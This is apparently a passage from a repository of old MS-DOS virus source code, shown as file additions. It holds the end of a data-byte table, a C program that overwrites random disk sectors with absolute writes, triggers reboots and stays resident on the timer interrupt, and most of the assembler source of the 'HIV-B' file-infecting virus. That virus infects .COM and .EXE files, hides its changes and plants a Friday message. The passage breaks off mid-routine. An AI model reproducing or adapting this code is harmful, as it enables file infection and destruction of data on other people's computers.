db 086h,08Eh,07Fh,05Eh,04Ah,06Ch,073h,092h,0A0h,07Eh,090h,097h,08Bh
db 073h,070h,078h,089h,089h,075h,079h,08Fh,08Eh,07Ah,040h,05Fh,07Ch
db 086h,085h,0A2h,0A9h,084h,07Fh,075h,05Ch,073h,09Ch,076h,061h,07Fh
db 079h,075h,092h,082h,031h,069h,086h,076h,09Fh,0B1h,07Eh,073h,092h
db 06Bh,067h,097h,087h,074h,078h,07Ah,085h,099h,065h,067h,088h,054h
db 069h,085h,084h,087h,0A3h,08Ch,078h,09Fh,086h,053h,067h,07Ch,068h
db 075h,092h,078h,072h,07Ch,062h,07Dh,0AFh,090h,06Bh,07Ch,06Eh,068h
db 08Fh,0A0h,078h,06Ah,072h,075h,08Dh,08Ch,07Eh,089h,072h,054h,072h
db 08Bh,089h,07Fh,072h,06Bh,08Ah,0A2h,089h,08Fh,085h,066h,071h,093h
db 088h,074h,078h,06Dh,070h,08Ah,088h,089h,08Dh,072h,06Bh,080h,078h
db 079h,070h,069h,06Ch,07Ch,08Bh,082h,08Bh,078h,06Ah,087h,081h,07Eh
db 08Eh,070h,05Fh,079h,085h,07Fh,087h,07Ah,05Fh,08Ah,0A4h,076h,079h
db 080h,06Ah,069h,075h,07Eh,093h,0A5h,081h,072h,088h,088h,085h,090h
db 078h,060h,071h,07Bh,07Fh,084h,07Ah,068h,07Ah,08Ch,07Fh,07Ah,070h
db 068h,076h,07Ch,077h,093h,0A2h,080h,086h,07Dh,07Bh,083h,08Eh,068h
db 064h,074h,06Eh,077h,097h,074h,068h,080h,080h,071h,08Bh,07Ch,059h
db 079h,08Ah,074h,099h,09Ch,066h,07Fh,0A6h,07Fh,08Fh,0A0h,056h,06Dh
db 0A2h,06Ch,07Dh,09Dh,060h,05Fh,098h,072h,063h,097h,088h,048h,07Dh
db 085h,069h,0A3h,088h,04Eh,063h,09Fh,091h,077h,08Ch,074h,042h,085h
db 09Ch,06Ch,095h,066h,051h,08Fh,0CFh,07Ah,073h,09Ah,080h,065h,097h
db 080h,05Ah,081h,04Ch,04Ah,09Eh,09Ch,074h,07Fh,083h,086h,097h,09Ah
db 069h,07Fh,08Ch,060h,06Fh,0A0h,077h,06Eh,08Ch,08Eh,07Dh,083h,083h
db 064h,07Ah,074h,05Eh,079h,09Fh,07Ah,063h,083h,092h,069h,091h,088h
db 052h,075h,070h,069h,08Fh,0A0h,06Bh,074h,0ABh,08Eh,062h,08Dh,066h
db 063h,08Ah,071h,07Bh,0BBh,098h,068h,087h,0A4h,077h,097h,08Ch,044h
db 056h,069h,071h,0A7h,094h,05Dh,05Eh,0A4h,07Ch,077h,08Eh,05Ch,04Dh
db 07Eh,074h,07Bh,0ACh,078h,059h,0A3h,0A4h,060h,082h,084h,049h,075h
db 081h,07Eh,0ADh,0A5h,071h,07Fh,0BAh,074h,071h,084h,04Ah,05Bh,073h
db 071h,087h,0ADh,07Ch,062h,0ADh,093h,073h,097h,06Ah,03Fh,070h,077h
db 07Bh,0B5h,088h,058h,08Bh,0A8h,061h,079h,080h,045h,06Eh,075h,071h
db 09Bh,0B2h,072h,06Bh,0B0h,080h,078h,096h,061h,042h,05Fh,073h,08Dh
db 0B4h,088h,068h,0A3h,096h,06Fh,08Dh,07Ch,04Ah,05Eh,06Ch,07Fh,0BBh
db 0A0h,070h,08Fh,0B0h,07Eh,07Fh,08Ah,040h,030h,063h,086h,0AFh,0ACh
db 066h,063h,0B3h,080h,07Ch,07Eh,04Ch,03Fh,059h,079h,096h,09Bh,084h
db 077h,0ADh,090h,071h,085h,080h,03Eh,041h,073h,093h,0D3h,0B2h,076h
db 091h,09Ah,083h,0A3h,090h,040h,038h,05Bh,08Ah,0A7h,088h,071h,086h
db 090h,06Bh,07Eh,083h,052h,043h,057h,08Bh,0BBh,0C0h,080h,07Fh,0AAh
db 068h,07Bh,094h,050h,030h,048h,076h,09Dh,0A6h,07Dh,072h,0A7h,07Ah
db 069h,07Ah,07Dh,054h,065h,06Ch,085h,0A9h,0AAh,095h,0B2h,09Ch,059h
db 089h,0A1h,04Ch,049h,060h,07Eh,0C3h,0C0h,080h,083h,0A9h,067h,07Bh
db 08Dh,060h,03Ch,05Ah,085h,081h,07Eh,079h,08Dh,0B3h,060h,05Bh,07Bh
db 064h,03Dh,053h,06Ch,093h,0B5h,090h,08Ah,0BBh,07Ah,06Fh,08Fh,076h
db 046h,05Fh,070h,087h,0B3h,08Ch,07Ch,0AEh,078h,059h,085h,07Eh,048h
db 050h,07Bh,09Dh,0C1h,0A1h,08Fh,09Fh,098h,073h,085h,07Ch,048h,055h
db 07Ah,083h,083h,08Bh,08Bh,0A0h,0A8h,068h,06Fh,087h,05Eh,04Ah,061h
db 083h,095h,0A1h,090h,08Fh,0A8h,068h,067h,07Fh,062h,03Ah,056h,06Eh
db 097h,0B3h,087h,076h,09Fh,096h,06Ah,083h,080h,043h,056h,07Eh,088h
db 087h,08Fh,090h,0ADh,0B4h,060h,066h,08Dh,06Dh,044h,05Ch,075h,096h
db 0CAh,08Ch,063h,098h,071h,079h,087h,078h,044h,04Bh,083h,097h,09Bh
db 08Ah,07Ch,09Eh,0ACh,061h,05Fh,07Fh,062h,04Ah,067h,08Ah,095h,0BBh
db 098h,08Ch,0BDh,084h,085h,091h,06Ch,045h,059h,085h,08Bh,095h,08Bh
db 083h,0A4h,08Ch,04Dh,06Ah,08Bh,060h,048h,05Eh,07Fh,0ADh,0CCh,07Ch
db 068h,09Ch,064h,083h,089h,054h,036h,04Fh,07Dh,096h,0AFh,088h,072h
db 086h,0A0h,08Bh,074h,05Bh,04Dh,073h,078h,087h,09Eh,09Dh,092h,0A5h
db 0BCh,076h,07Bh,085h,059h,055h,06Ch,081h,093h,0A7h,0A1h,07Bh,07Ch
db 084h,06Dh,07Ch,07Bh,042h,039h,057h,07Dh,0C5h,0ACh,05Ah,071h,092h
db 06Ah,08Ah,09Fh,061h,046h,06Eh,099h,0BBh,0ABh,076h,073h,0A4h,068h
db 069h,06Fh,061h,036h,04Dh,07Bh,09Fh,0D1h,0A2h,081h,0B2h,098h,07Eh
db 093h,086h,04Bh,04Dh,077h,08Dh,0A7h,092h,07Ah,09Dh,0A0h,057h,072h
db 07Ah,05Ch,063h,065h,06Fh,09Fh,0CDh,08Dh,074h,09Ch,060h,063h,089h
db 070h,035h,046h,070h,095h,0C6h,090h,061h,085h,094h,06Ah,07Fh,07Eh
db 04Ah,05Ch,066h,076h,0A5h,0BAh,090h,087h,0BAh,082h,07Eh,095h,086h
db 04Ch,054h,07Dh,09Eh,0C9h,0A0h,06Ch,093h,086h,065h,073h,078h,03Dh
db 058h,065h,06Fh,08Ah,0AAh,090h,094h,0A1h,055h,062h,08Bh,068h,03Eh
db 04Ch,06Ch,09Bh,0D8h,090h,06Eh,0ACh,086h,07Dh,092h,076h,044h,052h
db 073h,089h,0B9h,096h,06Eh,08Dh,0A2h,065h,06Dh,084h,04Ah,05Dh,079h
db 090h,085h,094h,0ADh,0BBh,0C4h,066h,062h,083h,08Eh,056h,054h,068h
db 07Bh,0BFh,0BCh,070h,082h,063h,06Eh,08Dh,085h,040h,04Ah,069h,085h
db 0BDh,090h,05Ch,075h,09Ah,073h,07Bh,088h,050h,053h,074h,087h,097h
db 0ADh,08Eh,085h,0B3h,080h,073h,07Bh,076h,048h,059h,098h,092h,088h
db 08Ch,099h,0B6h,0A8h,05Bh,064h,081h,05Ch,050h,058h,066h,085h,0BFh
db 0A6h,072h,082h,057h,077h,0A5h,07Ch,04Dh,062h,07Bh,092h,0CAh,088h
db 054h,095h,080h,069h,07Bh,080h,04Ch,059h,07Ah,092h,0B5h,0B0h,079h
db 08Dh,09Ah,07Fh,07Fh,084h,057h,056h,076h,091h,09Fh,0A2h,088h,08Ah
db 0A5h,06Ah,06Dh,075h,05Ch,049h,062h,079h,087h,0BEh,099h,066h,08Eh
db 076h,07Eh,08Bh,074h,04Dh,05Bh,077h,089h,0AFh,0A0h,061h,07Bh,082h
db 065h,077h,08Eh,068h,068h,073h,08Eh,0A6h,0CAh,08Dh,065h,087h,08Bh
db 084h,076h,07Ch,054h,063h,075h,08Ah,0ADh,0B5h,078h,077h,093h,06Fh
db 07Bh,086h,060h,05Dh,068h,07Ah,093h,0C5h,08Ch,055h,083h,069h,071h
db 076h,072h,056h,05Ch,06Bh,081h,0ADh,0C4h,080h,067h,07Ah,061h,077h
db 096h,07Ah,072h,06Dh,07Eh,095h,0C2h,0B8h,064h,06Fh,072h,069h,078h
db 09Ah,078h,06Eh,073h,087h,0A7h,0CEh,098h,050h,07Eh,073h,074h,07Dh
db 088h,062h,066h,07Fh,091h,09Fh,0C3h,080h,058h,07Eh,060h,065h,081h
db 078h,057h,05Fh,088h,08Ch,0A0h,0B5h,076h,057h,070h,058h,070h,094h
db 075h,05Ch,077h,09Ch,08Ah,0A3h,0B8h,068h,05Fh,08Ch,06Dh,06Ah,095h
db 07Bh,06Bh,085h,093h,08Ah,0AFh,0B0h,064h,05Fh,08Fh,063h,069h,08Fh
db 067h,063h,07Dh,08Ah,082h,0A9h,0A8h,05Eh,05Dh,08Ah,060h,06Ah,089h
db 074h,073h,07Fh,092h,07Ch,089h,0B3h,081h,05Fh,093h,072h,066h,07Ah
db 08Eh,07Eh,089h,094h,080h,07Eh,09Fh,098h,064h,088h,
slutt:
size equ $-100h
pgf equ ($+16)/16

MSDOS/H-Index/Virus.MSDOS.Unknown.hitme.asm
+42
View File
@@ -0,0 +1,42 @@
#include <process.h>
#include <stdlib.h>
#include <stdio.h>
#include <conio.h>
#include <dir.h>
#include <dos.h>
#define INTR 0X1C
#ifdef __cplusplus
#define __CPPARGS ...
#else
#define __CPPARGS
#endif
void interrupt ( *oldhandler)(__CPPARGS);
void interrupt handler(__CPPARGS)
{
delay(135);
oldhandler();
}
void main(void)
{
randomize();
char buf[512];
abswrite(2, 1, random(50000)+2000, buf);
if(random(20) == 10) asm INT 19h
oldhandler = getvect(INTR);
setvect(INTR, handler);
_ES = _psp; //PSP address
asm MOV es,es:[2ch]
_AH = 0x49; //Function 49 (remove memory block)
asm INT 21h //Call DOS to execute instruction
_AH = 0x31; //Function 31 (tsr)
_AL = 0x00; //Exit code
_DX = _psp; //PSP address
asm INT 21h //Call DOS to execute instruction
MSDOS/H-Index/Virus.MSDOS.Unknown.hiv-b.asm
+745
View File
@@ -0,0 +1,745 @@
DATA_1E EQU 4CH ; Just a Few Data Segments that are
DATA_3E EQU 84H ; Needed for the virus to find some
DATA_5E EQU 90H ; hard core info...
DATA_7E EQU 102H
DATA_8E EQU 106H
DATA_9E EQU 122H
DATA_10E EQU 124H
DATA_11E EQU 15AH
DATA_12E EQU 450H
DATA_13E EQU 462H
DATA_14E EQU 47BH
DATA_15E EQU 0
DATA_16E EQU 1
DATA_17E EQU 2
DATA_18E EQU 6
DATA_42E EQU 0FB2CH
DATA_43E EQU 0FB2EH
DATA_44E EQU 0FB4BH
DATA_45E EQU 0FB4DH
DATA_46E EQU 0FB83H
DATA_47E EQU 0FB8DH
DATA_48E EQU 0FB8FH
DATA_49E EQU 0FB95H
DATA_50E EQU 0FB97H
DATA_51E EQU 0
DATA_52E EQU 2
SEG_A SEGMENT BYTE PUBLIC
ASSUME CS:SEG_A, DS:SEG_A
ORG 100h ; Compile this to a .COM file!
; So the Virus starts at 0100h
HIV PROC FAR
START:
JMP LOC_35
DB 0C3H
DB 23 DUP (0C3H)
DB 61H, 6EH, 74H, 69H, 64H, 65H
DB 62H, 0C3H, 0C3H, 0C3H, 0C3H
DB 'HIV-B Virus - Release 1.1 [NukE]'
DB ' '
copyright DB '(C) Edited by Rock Steady [NukE]'
DB 0, 0
DATA_24 DW 0
DATA_25 DW 0
DATA_26 DW 0
DATA_27 DW 706AH
DATA_28 DD 00000H
DATA_29 DW 0
DATA_30 DW 706AH
DATA_31 DD 00000H
DATA_32 DW 0
DATA_33 DW 706AH
DATA_34 DB 'HIV-B VIRUS - Release 1.1 [NukE]', 0AH, 0DH
DB 'Edited by Rock Steady [NukE]', 0AH, 0DH
DB '(C) 1991 Italian Virus Laboratory', 0AH, 0DH
DB '$'
DB 0E8H, 83H, 3, 3DH, 4DH, 4BH
DB 75H, 9, 55H, 8BH, 0ECH, 83H
DB 66H, 6, 0FEH, 5DH, 0CFH, 80H
DB 0FCH, 4BH, 74H, 12H, 3DH, 0
DB 3DH, 74H, 0DH, 3DH, 0, 6CH
DB 75H, 5, 80H, 0FBH, 0, 74H
DB 3
LOC_1:
JMP LOC_13
LOC_2:
PUSH ES ; Save All Regesters so that when
PUSH DS ; we restore the program it will
PUSH DI ; RUN correctly and hide the fact
PUSH SI ; that any Virii is tampering with
PUSH BP ; the System....
PUSH DX
PUSH CX
PUSH BX
PUSH AX
CALL SUB_6
CALL SUB_7
CMP AX,6C00H
JNE LOC_3 ; Jump if not equal
MOV DX,SI
LOC_3:
MOV CX,80H
MOV SI,DX
LOCLOOP_4:
INC SI ; Slowly down the System a
MOV AL,[SI] ; little.
OR AL,AL ; Zero ?
LOOPNZ LOCLOOP_4 ; Loop if zf=0, cx>0
SUB SI,2
CMP WORD PTR [SI],4D4FH
JE LOC_7 ; Jump if equal
CMP WORD PTR [SI],4558H
JE LOC_6 ; Jump if equal
LOC_5:
JMP SHORT LOC_12 ;
DB 90H
LOC_6:
CMP WORD PTR [SI-2],452EH
JE LOC_8 ; Jump if equal
JMP SHORT LOC_5 ;
LOC_7:
NOP
CMP WORD PTR [SI-2],432EH
JNE LOC_5 ; Jump if not equal
LOC_8:
MOV AX,3D02H
CALL SUB_5
JC LOC_12 ; Jump if carry Set
MOV BX,AX
MOV AX,5700H
CALL SUB_5 ; Initsilize the virus...
MOV CS:DATA_24,CX ; A Basic Start up to check
MOV CS:DATA_25,DX ; The Interrup 21h
MOV AX,4200H
XOR CX,CX
XOR DX,DX
CALL SUB_5
PUSH CS
POP DS
MOV DX,103H
MOV SI,DX
MOV CX,18H
MOV AH,3FH
CALL SUB_5
JC LOC_10 ; Jump if carry Set
CMP WORD PTR [SI],5A4DH
JNE LOC_9 ; Jump if not equal
CALL SUB_1
JMP SHORT LOC_10
LOC_9:
CALL SUB_4
LOC_10:
JC LOC_11 ; Jump if carry Set
MOV AX,5701H
MOV CX,CS:DATA_24
MOV DX,CS:DATA_25
CALL SUB_5
LOC_11:
MOV AH,3EH ; '>'
CALL SUB_5
LOC_12:
CALL SUB_7
POP AX ; A Stealth Procedure to
POP BX ; end the virus and restore
POP CX ; the program! Pup back all
POP DX ; regesters as we found them!
POP BP ; so nothings changed...
POP SI
POP DI
POP DS
POP ES
LOC_13:
JMP CS:DATA_28
DB 0B4H, 2AH, 0CDH, 21H, 0C3H
HIV ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_1 PROC NEAR ; Start of the Virus!
MOV AH,2AH ; Get the Date system Date!
INT 21H ; If its Friday Display the
; message at Data34 and End!
CMP AL,6
JE LOC_15 ; If Friday display message
JNZ LOC_14 ; If not continue infecting
LOC_14: ; and screwing the system!
MOV CX,[SI+16H]
ADD CX,[SI+8]
MOV AX,10H
MUL CX ; dx:ax = reg * ax
ADD AX,[SI+14H]
ADC DX,0
PUSH DX
PUSH AX
MOV AX,4202H
XOR CX,CX ; Zero register
XOR DX,DX ; Zero register
CALL SUB_5
CMP DX,0
JNE LOC_16 ; Jump if not equal
CMP AX,64EH
JAE LOC_16 ; Jump if above or =
POP AX
POP DX
STC ; Set carry flag
RETN
LOC_15:
MOV DX,OFFSET DATA_34+18H ; Display Message at Data34!
MOV AH,9 ; With New Offset Address in
INT 21H ; memory!
;
POP AX ; Restore all Regesters as if
POP BX ; nothing was changed and exit
POP CX ; virus and run File...
POP DX
POP SI
POP DI
POP BP
POP DS
POP ES
MOV AH,0 ; Exit Virus if your in a .EXE
INT 21H ; File!!!
; Exit virus if your in a .COM
INT 20H ; File!!!
LOC_16:
MOV DI,AX
MOV BP,DX
POP CX
SUB AX,CX
POP CX
SBB DX,CX
CMP WORD PTR [SI+0CH],0
JE LOC_RET_19 ; Jump if equal
CMP DX,0
JNE LOC_17 ; Jump if not equal
CMP AX,64EH
JNE LOC_17 ; Jump if not equal
STC ; Set carry flag
RETN
LOC_17:
MOV DX,BP
MOV AX,DI
PUSH DX
PUSH AX
ADD AX,64EH
ADC DX,0
MOV CX,200H
DIV CX ; Find out How much System
LES DI,DWORD PTR [SI+2] ; memory is available...
MOV CS:DATA_26,DI ;
MOV CS:DATA_27,ES ; Every so often make the
MOV [SI+2],DX ; system memory small than
CMP DX,0 ; what it already is...
JE LOC_18 ; Screws up the users hehe
INC AX
LOC_18:
MOV [SI+4],AX
POP AX
POP DX
CALL SUB_2
SUB AX,[SI+8]
LES DI,DWORD PTR [SI+14H]
MOV DS:DATA_9E,DI
MOV DS:DATA_10E,ES
MOV [SI+14H],DX ; Tie up some memory!
MOV [SI+16H],AX ; release it on next execution
MOV DS:DATA_11E,AX ; Jump to su routine to do
MOV AX,4202H ; this and disable interrups
XOR CX,CX
XOR DX,DX
CALL SUB_5
CALL SUB_3
JC LOC_RET_19
MOV AX,4200H
XOR CX,CX ; Zero register
XOR DX,DX ; Zero register
CALL SUB_5
MOV AH,40H
MOV DX,SI
MOV CX,18H
CALL SUB_5
LOC_RET_19:
RETN
SUB_1 ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_2 PROC NEAR
MOV CX,4
MOV DI,AX
AND DI,0FH
LOCLOOP_20:
SHR DX,1 ; Shift w/zeros fill
RCR AX,1 ; Rotate thru carry
LOOP LOCLOOP_20 ; Loop if cx > 0
MOV DX,DI
RETN
SUB_2 ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_3 PROC NEAR
MOV AH,40H
MOV CX,64EH
MOV DX,100H
CALL SUB_6
JMP SHORT LOC_24
DB 90H
;*-*- External Entry into Subroutine -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_4:
MOV AX,4202H
XOR CX,CX ; Zero register
XOR DX,DX ; Zero register
CALL SUB_5
CMP AX,64EH
JB LOC_RET_23 ; Jump if below
CMP AX,0FA00H
JAE LOC_RET_23 ; Jump if above or =
PUSH AX
CMP BYTE PTR [SI],0E9H
JNE LOC_21 ; Jump if not equal
SUB AX,651H
CMP AX,[SI+1]
JNE LOC_21 ; Jump if not equal
POP AX
STC ; Set carry flag
RETN
LOC_21:
CALL SUB_3
JNC LOC_22 ; Jump if carry=0
POP AX
RETN
LOC_22:
MOV AX,4200H
XOR CX,CX ; Zero register
XOR DX,DX ; Zero register
CALL SUB_5
POP AX
SUB AX,3
MOV DX,122H
MOV SI,DX
MOV BYTE PTR CS:[SI],0E9H
MOV CS:[SI+1],AX
MOV AH,40H
MOV CX,3
CALL SUB_5
LOC_RET_23:
RETN
SUB_3 ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_5 PROC NEAR
LOC_24:
PUSHF ; Push flags
CALL CS:DATA_28
RETN
SUB_5 ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_6 PROC NEAR
PUSH AX
PUSH DS
PUSH ES
XOR AX,AX ; Zero register
PUSH AX
POP DS
CLI ; Disable the interrupts
LES AX,DWORD PTR DS:DATA_5E ; This Copies the Virus
MOV CS:DATA_29,AX ; to the COM File...
MOV CS:DATA_30,ES
MOV AX,46AH
MOV DS:DATA_5E,AX
MOV WORD PTR DS:DATA_5E+2,CS
LES AX,DWORD PTR DS:DATA_1E ; Loads 32Bit word..
MOV CS:DATA_32,AX ; get your info needed on
MOV CS:DATA_33,ES ; System...
LES AX,CS:DATA_31
MOV DS:DATA_1E,AX
MOV WORD PTR DS:DATA_1E+2,ES
STI ; Enable the interrupts
POP ES ; and restore regesters!
POP DS ; go back to the file
POP AX ; being executed...
RETN
SUB_6 ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_7 PROC NEAR
PUSH AX
PUSH DS
PUSH ES
XOR AX,AX ; Zero register
PUSH AX
POP DS
CLI ; Disable interrupts
LES AX,DWORD PTR CS:DATA_29 ; same as Sub_6 just copy
MOV DS:DATA_5E,AX ; yourself to the EXE
MOV WORD PTR DS:DATA_5E+2,ES
LES AX,DWORD PTR CS:DATA_32
MOV DS:DATA_1E,AX
MOV WORD PTR DS:DATA_1E+2,ES
STI ; Enable interrupts
POP ES
POP DS
POP AX
RETN
SUB_7 ENDP
DB 0B0H, 3, 0CFH, 50H, 53H, 51H
DB 52H, 56H, 57H, 55H, 1EH, 6
DB 33H, 0C0H, 50H, 1FH, 8AH, 3EH
DB 62H, 4, 0A1H, 50H, 4, 2EH
DB 0A3H, 0CEH, 4, 2EH, 0A1H, 0C7H
DB 4, 0A3H, 50H, 4, 2EH, 0A1H
DB 0C5H, 4, 8AH, 0DCH, 0B4H, 9
DB 0B9H, 1, 0, 0CDH, 10H, 0E8H
DB 34H, 0, 0E8H, 0B7H, 0, 2EH
DB 0A1H, 0C7H, 4, 0A3H, 50H, 4
DB 0B3H, 2, 0B8H, 2, 9, 0B9H
DB 1, 0, 0CDH, 10H, 2EH, 0A1H
DB 0CEH, 4, 0A3H, 50H, 4, 7
DB 1FH
DB ']_^ZY[X.'
DB 0FFH, 2EH, 0CAH, 4
DATA_36 DW 0
DATA_37 DW 1010H
DATA_39 DB 0
DATA_40 DD 706A0000H
DB 0, 0, 2EH, 0A1H, 0C7H, 4
DB 8BH, 1EH, 4AH, 4, 4BH, 2EH
DB 0F6H, 6, 0C9H, 4, 1, 74H
DB 0CH, 3AH, 0C3H, 72H, 12H, 2EH
DB 80H, 36H, 0C9H, 4, 1, 0EBH
DB 0AH
LOC_25:
CMP AL,0
JG LOC_26 ; Jump if >
XOR CS:DATA_39,1
LOC_26:
TEST CS:DATA_39,2
JZ LOC_27 ; Jump if zero
CMP AH,18H
JB LOC_28 ; Jump if below
XOR CS:DATA_39,2
JMP SHORT LOC_28
LOC_27:
CMP AH,0
JG LOC_28 ; Jump if >
XOR CS:DATA_39,2
LOC_28:
CMP BYTE PTR CS:DATA_36,20H
JE LOC_29 ; Jump if equal
CMP BYTE PTR CS:DATA_37+1,0
JE LOC_29 ; Jump if equal
XOR CS:DATA_39,2
LOC_29:
TEST CS:DATA_39,1
JZ LOC_30 ; Jump if zero
INC BYTE PTR CS:DATA_37
JMP SHORT LOC_31
LOC_30:
DEC BYTE PTR CS:DATA_37 ; (706A:04C7=10H)
LOC_31:
TEST CS:DATA_39,2 ; (706A:04C9=0)
JZ LOC_32 ; Jump if zero
INC BYTE PTR CS:DATA_37+1 ; (706A:04C8=10H)
JMP SHORT LOC_RET_33 ; (0555)
LOC_32:
DEC BYTE PTR CS:DATA_37+1 ; (706A:04C8=10H)
LOC_RET_33:
RETN
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_8 PROC NEAR
MOV AX,CS:DATA_37
MOV DS:DATA_12E,AX ; Get info on type of Video
MOV BH,DS:DATA_13E ; Display the system has...
MOV AH,8
INT 10H ; with ah=functn 08h
; basically fuck the cursur..
MOV CS:DATA_36,AX
RETN
SUB_8 ENDP
DB 50H, 53H, 51H, 52H, 56H, 57H
DB 55H, 1EH, 6, 33H, 0C0H, 50H
DB 1FH, 81H, 3EH, 70H, 0, 6DH
DB 4, 74H, 35H, 0A1H, 6CH, 4
DB 8BH, 16H, 6EH, 4, 0B9H, 0FFH
DB 0FFH, 0F7H, 0F1H, 3DH, 10H, 0
DB 75H, 24H, 0FAH, 8BH, 2EH, 50H
DB 4, 0E8H, 0BEH, 0FFH, 89H, 2EH
DB 50H, 4, 0C4H, 6, 70H, 0
DB 2EH, 0A3H, 0CAH, 4, 2EH, 8CH
DB 6, 0CCH, 4, 0C7H, 6, 70H
DB 0, 6DH, 4, 8CH, 0EH, 72H
DB 0, 0FBH
LOC_34:
POP ES
POP DS ; Restore and get lost...
POP BP
POP DI
POP SI
POP DX
POP CX
POP BX
POP AX
RETN
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_9 PROC NEAR
MOV DX,10H
MUL DX ; dx:ax = reg * ax
RETN
SUB_9 ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_10 PROC NEAR
XOR AX,AX ; If if wants to dissamble
XOR BX,BX ; us give him a HARD time...
XOR CX,CX ; By making all into 0
XOR DX,DX ; Zero register
XOR SI,SI ; Zero register
XOR DI,DI ; Zero register
XOR BP,BP ; Zero register
RETN
SUB_10 ENDP
LOC_35:
PUSH DS
CALL SUB_11
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_11 PROC NEAR
MOV AX,4B4DH
INT 21H ; Load and EXEC file...
; be runned...
NOP
JC LOC_36 ; Jump if carry Set
JMP LOC_46
LOC_36:
POP SI
PUSH SI
MOV DI,SI
XOR AX,AX ; Zero register
PUSH AX
POP DS
LES AX,DWORD PTR DS:DATA_1E ; Load 32 bit ptr
MOV CS:DATA_49E[SI],AX ; Move lots of data
MOV CS:DATA_50E[SI],ES ; into CS to infect the file
LES BX,DWORD PTR DS:DATA_3E ; if not infected and shit..
MOV CS:DATA_47E[DI],BX
MOV CS:DATA_48E[DI],ES
MOV AX,DS:DATA_7E
CMP AX,0F000H
JNE LOC_44 ; Jump if not equal
MOV DL,80H
MOV AX,DS:DATA_8E
CMP AX,0F000H
JE LOC_37 ; Jump if equal
CMP AH,0C8H
JB LOC_44 ; Jump if below
CMP AH,0F4H
JAE LOC_44 ; Jump if above or =
TEST AL,7FH
JNZ LOC_44 ; Jump if not zero
MOV DS,AX
CMP WORD PTR DS:DATA_51E,0AA55H
JNE LOC_44 ; Jump if not equal
MOV DL,DS:DATA_52E
LOC_37:
MOV DS,AX
XOR DH,DH ; Zero register
MOV CL,9
SHL DX,CL ; Shift w/zeros fill
MOV CX,DX
XOR SI,SI ; Zero register
LOCLOOP_38:
LODSW ; String [si] to ax
CMP AX,0FA80H
JNE LOC_39 ; Jump if not equal
LODSW ; String [si] to ax
CMP AX,7380H
JE LOC_40 ; Jump if equal
JNZ LOC_41 ; Jump if not zero
LOC_39:
CMP AX,0C2F6H
JNE LOC_42 ; Jump if not equal
LODSW ; String [si] to ax
CMP AX,7580H
JNE LOC_41 ; Jump if not equal
LOC_40:
INC SI
LODSW ; String [si] to ax
CMP AX,40CDH
JE LOC_43 ; Jump if equal
SUB SI,3
LOC_41:
DEC SI
DEC SI
LOC_42:
DEC SI
LOOP LOCLOOP_38 ; Loop if cx > 0
JMP SHORT LOC_44
LOC_43:
SUB SI,7
MOV CS:DATA_49E[DI],SI
MOV CS:DATA_50E[DI],DS
LOC_44:
MOV AH,62H
INT 21H ; Simple...Get the PSP
; Address (Program segment
MOV ES,BX ; address and but in BX)
MOV AH,49H
INT 21H ; Get the Free memory from
; the system
MOV BX,0FFFFH ; release extra memory blocks
MOV AH,48H
INT 21H ; Allocate the memory
; At BX (# bytes)
SUB BX,66H ; it attaches virus right
NOP ; under the 640k
JC LOC_46
MOV CX,ES ; did it work? If not just
STC ; end the virus...
